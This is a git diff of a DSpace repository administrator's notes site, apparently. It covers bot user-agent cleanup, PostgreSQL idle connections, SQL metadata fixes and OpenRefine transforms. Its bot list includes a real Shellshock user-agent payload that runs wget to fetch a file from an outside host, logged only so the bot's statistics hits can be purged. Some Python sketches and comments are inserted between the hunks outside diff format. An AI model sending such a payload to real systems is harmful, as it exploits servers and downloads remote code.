diff --git a/content/posts/2022-03.md b/content/posts/2022-03.md
index 74c121c0a..eca29392a 100644
--- a/content/posts/2022-03.md
+++ b/content/posts/2022-03.md
@@ -18,4 +18,56 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv >
+## 2022-03-04
+
+- Looking over the CGSpace Solr statistics from 2022-02
+  - I see a few new bots, though once I expanded my search for user agents with "www" in the name I found so many more!
+  - Here are some of the more prevalent or weird ones:
+    - axios/0.21.1
+    - Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)
+    - Nutraspace/Nutch-1.2 (www.nutraspace.com)
+    - Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; webmaster@moreover.com)
+    - Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com
+    - Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)
+    - Crowsnest/0.5 (+http://www.crowsnest.tv/)
+    - Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com
+    - metha/0.2.27
+    - ZaloPC-win32-24v454
+    - Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x
+    - ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)
+    - FullStoryBot/1.0 (+https://www.fullstory.com)
+    - Link Validity Check From: http://www.usgs.gov
+    - OSPScraper (+https://www.opensyllabusproject.org)
+    - () { :;}; /bin/bash -c \"wget -O /tmp/bbb www.redel.net.br/1.php?id=3137382e37392e3138372e313832\"
+  - I submitted [a pull request to COUNTER-Robots](https://github.com/atmire/COUNTER-Robots/pull/52) with some of these
+- I purged a bunch of hits from the stats using the `check-spider-hits.sh` script:
+
+```console
+]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
+Purging 6 hits from scalaj-http in statistics
+Purging 5 hits from lua-resty-http in statistics
+Purging 9 hits from AHC in statistics
+Purging 7 hits from acebookexternalhit in statistics
+Purging 1011 hits from axios\/[0-9] in statistics
+Purging 2216 hits from Faveeo\/[0-9] in statistics
+Purging 1164 hits from Moreover\/[0-9] in statistics
+Purging 740 hits from Exploratodo\/[0-9] in statistics
+Purging 585 hits from GroupHigh\/[0-9] in statistics
+Purging 438 hits from Crowsnest\/[0-9] in statistics
+Purging 1326 hits from nbertaupete95 in statistics
+Purging 182 hits from metha\/[0-9] in statistics
+Purging 68 hits from ZaloPC-win32-24v454 in statistics
+Purging 1644 hits from Firefox\/x\.x in statistics
+Purging 678 hits from ZoteroTranslationServer in statistics
+Purging 27 hits from FullStoryBot in statistics
+Purging 26 hits from Link Validity Check in statistics
+Purging 26 hits from OSPScraper in statistics
+Purging 1 hits from 3137382e37392e3138372e313832 in statistics
+Purging 2755 hits from Nutch-[0-9] in statistics
+
+Total number of bot hits purged: 12914
+```
+
+- I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project
+
diff --git a/docs/2015-11/index.html b/docs/2015-11/index.html
index 0b48d1474..a0dba88bb 100644
--- a/docs/2015-11/index.html
+++ b/docs/2015-11/index.html
@@ -34,7 +34,7 @@ Last week I had increased the limit from 30 to 60, which seemed to help, but now
$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
78
"/>
-
+
@@ -126,7 +126,7 @@ $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspac
-$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
+$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
78
- For now I have increased the limit from 60 to 90, run updates, and rebooted the server
@@ -137,7 +137,7 @@ $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspac
- Getting emails from uptimeRobot and uptimeButler that it’s down, and Google Webmaster Tools is sending emails that there is an increase in crawl errors
- Looks like there are still a bunch of idle PostgreSQL connections:
-$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
+$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
96
- For some reason the number of idle connections is very high since we upgraded to DSpace 5
@@ -167,12 +167,12 @@ location ~ /(themes|static|aspects/ReportingSuite) {
- Need to check /about on CGSpace, as it’s blank on my local test server and we might need to add something there
- CGSpace has been up and down all day due to PostgreSQL idle connections (current DSpace pool is 90):
-$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
+$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
93
- I looked closer at the idle connections and saw that many have been idle for hours (current time on server is 2015-11-25T20:20:42+0000):
-$ psql -c 'SELECT * from pg_stat_activity;' | less -S
+$ psql -c 'SELECT * from pg_stat_activity;' | less -S
datid | datname | pid | usesysid | usename | application_name | client_addr | client_hostname | client_port | backend_start | xact_start |
-------+----------+-------+----------+----------+------------------+-------------+-----------------+-------------+-------------------------------+-------------------------------+---
20951 | cgspace | 10966 | 18205 | cgspace | | 127.0.0.1 | | 37731 | 2015-11-25 13:13:02.837624+00 | | 20
@@ -197,7 +197,7 @@ datid | datname | pid | usesysid | usename | application_name | client_addr
Monitoring e-mailed in the evening to say CGSpace was down
Idle connections in PostgreSQL again:
-$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
+$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
66
- At the time, the current DSpace pool size was 50…
@@ -215,7 +215,7 @@ db.statementpool = true
- And idle connections:
-$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
+$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
49
- Perhaps I need to start drastically increasing the connection limits—like to 300—to see if DSpace’s thirst can ever be quenched
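
The repeated `psql ... | grep cgspace | grep -c idle` check in these notes could be scripted for logging the count over time. The following is a minimal sketch, not what was actually run: the function name `count_idle` and the abbreviated sample rows are hypothetical, and it performs the same naive substring match as the grep pipeline, so any row that merely mentions "idle" somewhere would also be counted.

```python
def count_idle(psql_output: str, database: str = "cgspace") -> int:
    """Count lines that mention both the database name and the word "idle"."""
    return sum(
        1
        for line in psql_output.splitlines()
        if database in line and "idle" in line
    )


# Hypothetical, heavily abbreviated rows in the style of pg_stat_activity output
sample = """\
 20951 | cgspace  | 10966 | cgspace  | 127.0.0.1 | idle
 20951 | cgspace  | 10967 | cgspace  | 127.0.0.1 | active
 12029 | postgres | 11001 | postgres |           | idle
 20951 | cgspace  | 10968 | cgspace  | 127.0.0.1 | idle
"""

print(count_idle(sample))
```

Matching on the `state` column specifically would be more robust, but that depends on the PostgreSQL version's column layout, which these notes do not show in full.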
diff --git a/docs/2015-12/index.html b/docs/2015-12/index.html
index c1bbaed7e..4c9853f03 100644
--- a/docs/2015-12/index.html
+++ b/docs/2015-12/index.html
@@ -36,7 +36,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
"/>
-
+
@@ -137,7 +137,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
- CGSpace went down again (due to PostgreSQL idle connections of course)
- Current database settings for DSpace are db.maxconnections = 30 and db.maxidle = 8, yet idle connections are exceeding this:
-$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
+$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
39
- I restarted PostgreSQL and Tomcat and it’s back
@@ -189,7 +189,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
- CGSpace very slow, and monitoring emailing me to say it’s down, even though I can load the page (very slowly)
- Idle postgres connections look like this (with no change in DSpace db settings lately):
-$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
+$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
29
- I restarted Tomcat and postgres…
@@ -214,7 +214,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
- CGSpace has been up and down all day and REST API is completely unresponsive
- PostgreSQL idle connections are currently:
-postgres@linode01:~$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
+postgres@linode01:~$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
28
- I have reverted all the pgtune tweaks from the other day, as they didn’t fix the stability issues, so I’d rather not have them introducing more variables into the equation
diff --git a/docs/2016-01/index.html b/docs/2016-01/index.html
index 5dc10cc9b..f84804af9 100644
--- a/docs/2016-01/index.html
+++ b/docs/2016-01/index.html
@@ -28,7 +28,7 @@ Move ILRI collection 10568/12503 from 10568/27869 to 10568/27629 using the move_
I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.
Update GitHub wiki for documentation of maintenance tasks.
"/>
-
+
@@ -135,7 +135,7 @@ Update GitHub wiki for documentation of maintenance tasks.
- Tweak date-based facets to show more values in drill-down ranges (#162)
- Need to remember to clear the Cocoon cache after deployment or else you don’t see the new ranges immediately
- Set up recipe on IFTTT to tweet new items from the CGSpace Atom feed to my twitter account
-- Altmetrics' support for Handles is kinda weak, so they can’t associate our items with DOIs until they are tweeted or blogged, etc first.
+- Altmetrics’ support for Handles is kinda weak, so they can’t associate our items with DOIs until they are tweeted or blogged, etc first.
2016-01-21
diff --git a/docs/2016-02/index.html b/docs/2016-02/index.html
index e9eb2e083..88805586e 100644
--- a/docs/2016-02/index.html
+++ b/docs/2016-02/index.html
@@ -38,7 +38,7 @@ I noticed we have a very interesting list of countries on CGSpace:
Not only are there 49,000 countries, we have some blanks (25)…
Also, lots of things like “COTE D`LVOIRE” and “COTE D IVOIRE”
"/>
-
+
@@ -145,15 +145,15 @@ Also, lots of things like “COTE D`LVOIRE” and “COTE D IVOIRE&r
- In this case our country field is 78
- Now find all resources with type 2 (item) that have null/empty values for that field:
-dspacetest=# select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=78 and (text_value='' OR text_value IS NULL);
+dspacetest=# select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=78 and (text_value='' OR text_value IS NULL);
- Then you can find the handle that owns it from its resource_id:
-dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '22678';
+dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '22678';
- It’s 25 items so editing in the web UI is annoying, let’s try SQL!
-dspacetest=# delete from metadatavalue where metadata_field_id=78 and text_value='';
+dspacetest=# delete from metadatavalue where metadata_field_id=78 and text_value='';
DELETE 25
- After that perhaps a regular dspace index-discovery (no -b) should suffice…
@@ -198,7 +198,7 @@ $ /opt/brew/Cellar/tomcat/8.0.30/bin/catalina start
- Add CATALINA_OPTS in /opt/brew/Cellar/tomcat/8.0.30/libexec/bin/setenv.sh, as this script is sourced by the catalina startup script
- For example:
-CATALINA_OPTS="-Djava.awt.headless=true -Xms2048m -Xmx2048m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8"
+CATALINA_OPTS="-Djava.awt.headless=true -Xms2048m -Xmx2048m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8"
- After verifying that the site is working, start a full index:
@@ -253,7 +253,7 @@ Swap: 255 57 198
There are 1200 records that have PDFs, and will need to be imported into CGSpace
I created a filename column based on the dc.identifier.url column using the following transform:
-value.split('/')[-1]
+value.split('/')[-1]
- Then I wrote a tool called generate-thumbnails.py to download the PDFs and generate thumbnails for them, for example:
@@ -278,13 +278,13 @@ Processing 64195.pdf
Looking at CIAT’s records again, there are some files linking to PDFs on Slide Share, Embrapa, UEA UK, and Condesan, so I’m not sure if we can use those
265 items have dirty, URL-encoded filenames:
-$ ls | grep -c -E "%"
+$ ls | grep -c -E "%"
265
- I suggest that we import ~850 or so of the clean ones first, then do the rest after I can find a clean/reliable way to decode the filenames
- This python2 snippet seems to work in the CLI, but not so well in OpenRefine:
-$ python -c "import urllib, sys; print urllib.unquote(sys.argv[1])" CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
+$ python -c "import urllib, sys; print urllib.unquote(sys.argv[1])" CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
- Merge pull requests for submission form theming (#178) and missing center subjects in XMLUI item views (#176)
@@ -294,7 +294,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
- Turns out OpenRefine has an unescape function!
-value.unescape("url")
+value.unescape("url")
- This turns the URLs into human-readable versions that we can use as proper filenames
- Run web server and system updates on DSpace Test and reboot
@@ -302,7 +302,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
- Then you create a facet for blank values on each column, show the rows that have values for one and not the other, then transform each independently to have the contents of the other, with “||” in between
- Work on Python script for parsing and downloading PDF records from dc.identifier.url
- To get filenames from dc.identifier.url, create a new column based on this transform: forEach(value.split('||'), v, v.split('/')[-1]).join('||')
-- This also works for records that have multiple URLs (separated by “||")
+- This also works for records that have multiple URLs (separated by “||”)
2016-02-17
@@ -325,7 +325,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
- To change Spanish accents to ASCII in OpenRefine:
-value.replace('ó','o').replace('í','i').replace('á','a').replace('é','e').replace('ñ','n')
+value.replace('ó','o').replace('í','i').replace('á','a').replace('é','e').replace('ñ','n')
- But actually, the accents might not be an issue, as I can successfully import files containing Spanish accents on my Mac
- On closer inspection, I can import files with the following names on Linux (DSpace Test):
@@ -353,7 +353,7 @@ Bitstream: tést señora alimentación.pdf
- Looking at the filenames for the CIAT Reports, some have really ugly characters, like: ' or , or = or [ or ] or ( or ) or _.pdf or ._ etc
- It’s tricky to parse those things in some programming languages so I’d rather just get rid of the weird stuff now in OpenRefine:
-value.replace("'",'').replace('_=_','_').replace(',','').replace('[','').replace(']','').replace('(','').replace(')','').replace('_.pdf','.pdf').replace('._','_')
+value.replace("'",'').replace('_=_','_').replace(',','').replace('[','').replace(']','').replace('(','').replace(')','').replace('_.pdf','.pdf').replace('._','_')
- Finally import the 1127 CIAT items into CGSpace: https://cgspace.cgiar.org/handle/10568/35710
- Re-deploy CGSpace with the Google Scholar fix, but I’m waiting on the Atmire fixes for now, as the branch history is ugly
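
The filename handling described in this month's notes (last URL segment, URL-decoding, stripping awkward characters) can be sketched outside OpenRefine as well. This is a rough Python 3 sketch under stated assumptions: the function names and the sample URL and filename are hypothetical, `urllib.parse.unquote` stands in for the python2 `urllib.unquote` call shown above, and the replacement list simply mirrors the GREL chain in the same order.

```python
from urllib.parse import unquote


def filenames_from_urls(value: str, separator: str = "||") -> str:
    """Keep the last path segment of each URL, like value.split('/')[-1] in GREL."""
    return separator.join(url.split("/")[-1] for url in value.split(separator))


def decode_filename(name: str) -> str:
    """Python 3 counterpart of the python2 urllib.unquote call in the notes."""
    return unquote(name)


def strip_ugly_characters(name: str) -> str:
    """Apply the same replacements, in the same order, as the GREL chain."""
    replacements = [
        ("'", ""), ("_=_", "_"), (",", ""), ("[", ""), ("]", ""),
        ("(", ""), (")", ""), ("_.pdf", ".pdf"), ("._", "_"),
    ]
    for old, new in replacements:
        name = name.replace(old, new)
    return name


# Hypothetical multi-value cell using the "||" separator from the notes
urls = "http://example.org/docs/a%20b.pdf||http://example.org/docs/c.pdf"
print(filenames_from_urls(urls))

# Filename taken from the notes above
encoded = "CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf"
print(decode_filename(encoded))

# Hypothetical messy filename
print(strip_ugly_characters("Report_[2010]_(final)_.pdf"))
```

The order of the replacements matters: `_.pdf` has to be collapsed before `._` is handled, which is why the list is applied sequentially rather than as a character set.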
diff --git a/docs/2016-03/index.html b/docs/2016-03/index.html
index 3f914d7dc..c731dfece 100644
--- a/docs/2016-03/index.html
+++ b/docs/2016-03/index.html
@@ -28,7 +28,7 @@ Looking at issues with author authorities on CGSpace
For some reason we still have the index-lucene-update cron job active on CGSpace, but I’m pretty sure we don’t need it as of the latest few versions of Atmire’s Listings and Reports module
Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server
"/>
-
+
@@ -128,7 +128,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
- I identified one commit that causes the issue and let them know
- Restart DSpace Test, as it seems to have crashed after Sisay tried to import some CSV or zip or something:
-Exception in thread "Lucene Merge Thread #19" org.apache.lucene.index.MergePolicy$MergeException: java.io.IOException: No space left on device
+Exception in thread "Lucene Merge Thread #19" org.apache.lucene.index.MergePolicy$MergeException: java.io.IOException: No space left on device
2016-03-08
- Add a few new filters to Atmire’s Listings and Reports module (#180)
@@ -261,7 +261,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
- Abenet is having problems saving group memberships, and she gets this error: https://gist.github.com/alanorth/87281c061c2de57b773e
-Can't find method org.dspace.app.xmlui.aspect.administrative.FlowGroupUtils.processSaveGroup(org.dspace.core.Context,number,string,[Ljava.lang.String;,[Ljava.lang.String;,org.apache.cocoon.environment.wrapper.RequestWrapper). (resource://aspects/Administrative/administrative.js#967)
+Can't find method org.dspace.app.xmlui.aspect.administrative.FlowGroupUtils.processSaveGroup(org.dspace.core.Context,number,string,[Ljava.lang.String;,[Ljava.lang.String;,org.apache.cocoon.environment.wrapper.RequestWrapper). (resource://aspects/Administrative/administrative.js#967)
- I can reproduce the same error on DSpace Test and on my Mac
- Looks to be an issue with the Atmire modules, I’ve submitted a ticket to their tracker.
diff --git a/docs/2016-04/index.html b/docs/2016-04/index.html
index 39b956379..5d4cf4f66 100644
--- a/docs/2016-04/index.html
+++ b/docs/2016-04/index.html
@@ -32,7 +32,7 @@ After running DSpace for over five years I’ve never needed to look in any
This will save us a few gigs of backup space we’re paying for on S3
Also, I noticed the checker log has some errors we should pay attention to:
"/>
-
+
@@ -150,7 +150,7 @@ java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290
******************************************************
- So this would be the tomcat7 Unix user, who seems to have a default limit of 1024 files in its shell
-- For what it’s worth, we have been setting the actual Tomcat 7 process' limit to 16384 for a few years (in /etc/default/tomcat7)
+- For what it’s worth, we have been setting the actual Tomcat 7 process’ limit to 16384 for a few years (in /etc/default/tomcat7)
- Looks like cron will read limits from /etc/security/limits.* so we can do something for the tomcat7 user there
- Submit pull request for Tomcat 7 limits in Ansible dspace role (#30)
@@ -159,10 +159,10 @@ java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290
Reduce Amazon S3 storage used for logs from 46 GB to 6 GB by deleting a bunch of logs we don’t need!
# s3cmd ls s3://cgspace.cgiar.org/log/ > /tmp/s3-logs.txt
-# grep checker.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
-# grep cocoon.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
-# grep handle-plugin.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
-# grep solr.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
+# grep checker.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
+# grep cocoon.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
+# grep handle-plugin.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
+# grep solr.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
- Also, adjust the cron jobs for backups so they only back up dspace.log and some stats files (.dat)
- Try to do some metadata field migrations using the Atmire batch UI (dc.Species → cg.species) but it took several hours and even missed a few records
@@ -199,13 +199,13 @@ UPDATE 51258
- Looking at the DOI issue reported by Leroy from CIAT a few weeks ago
- It seems the dx.doi.org URLs are much more proper in our repository!
-dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://dx.doi.org%';
+dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://dx.doi.org%';
count
-------
5638
(1 row)
-dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://doi.org%';
+dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://doi.org%';
count
-------
3
@@ -231,11 +231,11 @@ dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and t
I decided to keep the set of subjects that had FMD and RANGELANDS added, as their addition appears to have been requested, and it might be the newer list
I found 226 blank metadatavalues:
-dspacetest# select * from metadatavalue where resource_type_id=2 and text_value='';
+dspacetest# select * from metadatavalue where resource_type_id=2 and text_value='';
- I think we should delete them and do a full re-index:
-dspacetest=# delete from metadatavalue where resource_type_id=2 and text_value='';
+dspacetest=# delete from metadatavalue where resource_type_id=2 and text_value='';
DELETE 226
- I deleted them on CGSpace but I’ll wait to do the re-index as we’re going to be doing one in a few days for the metadata changes anyways
@@ -294,7 +294,7 @@ UPDATE metadatavalue SET metadata_field_id=215 WHERE metadata_field_id=106
UPDATE 3872
UPDATE metadatavalue SET metadata_field_id=217 WHERE metadata_field_id=108
UPDATE 46075
-$ JAVA_OPTS="-Xms512m -Xmx512m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace index-discovery -bf
+$ JAVA_OPTS="-Xms512m -Xmx512m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace index-discovery -bf
- CGSpace was down but I’m not sure why, this was in catalina.out:
@@ -387,7 +387,7 @@ UPDATE 46075
Basically, this gives us the ability to use the latest upstream stable 9.3.x release (currently 9.3.12)
Looking into the REST API errors again, it looks like these started appearing a few days ago in the tens of thousands:
-$ grep -c "Aborting context in finally statement" dspace.log.2016-04-20
+$ grep -c "Aborting context in finally statement" dspace.log.2016-04-20
21252
- I found a recent discussion on the DSpace mailing list and I’ve asked for advice there
@@ -423,7 +423,7 @@ UPDATE 46075
- Looks like the last one was “down” from about four hours ago
- I think there must be something with this REST stuff:
-# grep -c "Aborting context in finally statement" dspace.log.2016-04-*
+# grep -c "Aborting context in finally statement" dspace.log.2016-04-*
dspace.log.2016-04-01:0
dspace.log.2016-04-02:0
dspace.log.2016-04-03:0
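
The per-day `grep -c "Aborting context in finally statement" dspace.log.2016-04-*` check above could be sketched in Python for anyone who wants the counts as data rather than terminal output. This is only an illustration: the function names are hypothetical, and like `grep -c` it counts matching lines, not individual occurrences within a line.

```python
from pathlib import Path


def count_matching_lines(path: Path, needle: str) -> int:
    """Count lines containing needle, as grep -c does (lines, not occurrences)."""
    with path.open(encoding="utf-8", errors="replace") as handle:
        return sum(1 for line in handle if needle in line)


def counts_by_log(log_dir: Path, pattern: str, needle: str) -> dict:
    """Map each log file name matching the glob pattern to its matching-line count."""
    return {
        path.name: count_matching_lines(path, needle)
        for path in sorted(log_dir.glob(pattern))
    }
```

A call such as `counts_by_log(Path("/path/to/logs"), "dspace.log.2016-04-*", "Aborting context in finally statement")` would return one entry per daily log; the directory here is a placeholder, since the notes do not say where the logs live.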
diff --git a/docs/2016-05/index.html b/docs/2016-05/index.html
index edad6ad1f..330d7e837 100644
--- a/docs/2016-05/index.html
+++ b/docs/2016-05/index.html
@@ -34,7 +34,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
# awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l
3168
"/>
-
+
@@ -126,7 +126,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
I have blocked access to the API now
There are 3,000 IPs accessing the REST API in a 24-hour period!
-# awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l
+# awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l
3168
- The two most frequent requesters are in Ethiopia and Colombia: 213.55.99.121 and 181.118.144.29
@@ -166,8 +166,8 @@ LE_RESULT=$?
$SERVICE_BIN nginx start
-if [[ "$LE_RESULT" != 0 ]]; then
- echo 'Automated renewal failed:'
+if [[ "$LE_RESULT" != 0 ]]; then
+ echo 'Automated renewal failed:'
cat /var/log/letsencrypt/renew.log
@@ -240,7 +240,7 @@ fi
- Found ~200 messed up CIAT values in dc.publisher:
-# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=39 and text_value similar to "% %";
+# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=39 and text_value similar to "% %";
2016-05-13
- More theorizing about CGcore
@@ -259,7 +259,7 @@ fi
- They have thumbnails on Flickr and elsewhere
- In OpenRefine I created a new filename column based on the thumbnail column with the following GREL:
-if(cells['thumbnails'].value.contains('hqdefault'), cells['thumbnails'].value.split('/')[-2] + '.jpg', cells['thumbnails'].value.split('/')[-1])
+if(cells['thumbnails'].value.contains('hqdefault'), cells['thumbnails'].value.split('/')[-2] + '.jpg', cells['thumbnails'].value.split('/')[-1])
- Because ~400 records had the same filename on Flickr (hqdefault.jpg) but different UUIDs in the URL
- So for the hqdefault.jpg ones I just take the UUID (-2) and use it as the filename
@@ -269,7 +269,7 @@ fi
- More quality control on filename field of CCAFS records to make processing in shell and SAFBuilder more reliable:
-value.replace('_','').replace('-','')
+value.replace('_','').replace('-','')
- We need to hold off on moving dc.Species to cg.species because it is only used for plants, and might be better to move it to something like cg.species.plant
- And dc.identifier.fund is MOSTLY used for CPWF project identifier but has some other sponsorship things
@@ -281,17 +281,17 @@ fi
-# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
+# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
2016-05-20
- More work on CCAFS Video and Images records
- For SAFBuilder we need to modify filename column to have the thumbnail bundle:
-value + "__bundle:THUMBNAIL"
+value + "__bundle:THUMBNAIL"
- Also, I fixed some weird characters using OpenRefine’s transform with the following GREL:
-value.replace(/\u0081/,'')
+value.replace(/\u0081/,'')
- Write shell script to resize thumbnails with height larger than 400: https://gist.github.com/alanorth/131401dcd39d00e0ce12e1be3ed13256
- Upload 707 CCAFS records to DSpace Test
@@ -314,7 +314,7 @@ $ /home/dspacetest.cgiar.org/bin/dspace export -t COLLECTION -i 10568/79355 -d ~
- And then import to CGSpace:
-$ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/70974 --source /tmp/ccafs-images --mapfile=/tmp/ccafs-images-may30.map &> /tmp/ccafs-images-may30.log
+$ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/70974 --source /tmp/ccafs-images --mapfile=/tmp/ccafs-images-may30.map &> /tmp/ccafs-images-may30.log
- But now we have double authors for “CGIAR Research Program on Climate Change, Agriculture and Food Security” in the authority
- I’m trying to do a Discovery index before messing with the authority index
@@ -322,12 +322,12 @@ $ /home/dspacetest.cgiar.org/bin/dspace export -t COLLECTION -i 10568/79355 -d ~
- Run system updates on DSpace Test, re-deploy code, and reboot the server
- Clean up and import ~200 CTA records to CGSpace via CSV like:
-$ export JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8"
+$ export JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8"
$ /home/cgspace.cgiar.org/bin/dspace metadata-import -e aorth@mjanja.ch -f ~/CTA-May30/CTA-42229.csv &> ~/CTA-May30/CTA-42229.log
- Discovery indexing took a few hours for some reason, and after that I started the index-authority script
-$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace index-authority
+$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace index-authority
2016-05-31
- The index-authority script ran overnight and was finished in the morning
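
One caveat about the `awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l` count earlier in this month's notes: `uniq` only collapses adjacent duplicate lines, so without a `sort` in front of it the result counts runs of identical neighbouring IPs rather than distinct IPs, and the 3168 figure may be an overcount. The sketch below contrasts the two ways of counting. It assumes the client IP is the first whitespace-separated field of each log line; the function names and the sample lines are hypothetical, and blank lines are skipped, which differs slightly from the shell pipeline.

```python
def count_unique_ips(log_lines):
    """Count distinct first fields (assumed to be the client IP)."""
    return len({line.split()[0] for line in log_lines if line.strip()})


def count_adjacent_runs(log_lines):
    """Roughly mimic `awk '{print $1}' | uniq | wc -l`: count runs of adjacent identical IPs."""
    runs = 0
    previous = None
    for line in log_lines:
        if not line.strip():
            continue
        ip = line.split()[0]
        if ip != previous:
            runs += 1
            previous = ip
    return runs


# Hypothetical log lines that interleave the two IPs named in the notes
sample = [
    '213.55.99.121 - - "GET /rest/items HTTP/1.1" 200',
    '181.118.144.29 - - "GET /rest/items HTTP/1.1" 200',
    '213.55.99.121 - - "GET /rest/handle HTTP/1.1" 200',
]

print(count_unique_ips(sample), count_adjacent_runs(sample))
```

In shell terms the distinct count would correspond to adding `sort` before `uniq` (or using `sort -u`).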
diff --git a/docs/2016-06/index.html b/docs/2016-06/index.html
index f941e4199..8c132040d 100644
--- a/docs/2016-06/index.html
+++ b/docs/2016-06/index.html
@@ -34,7 +34,7 @@ This is their publications set: http://ebrary.ifpri.org/oai/oai.php?verb=ListRec
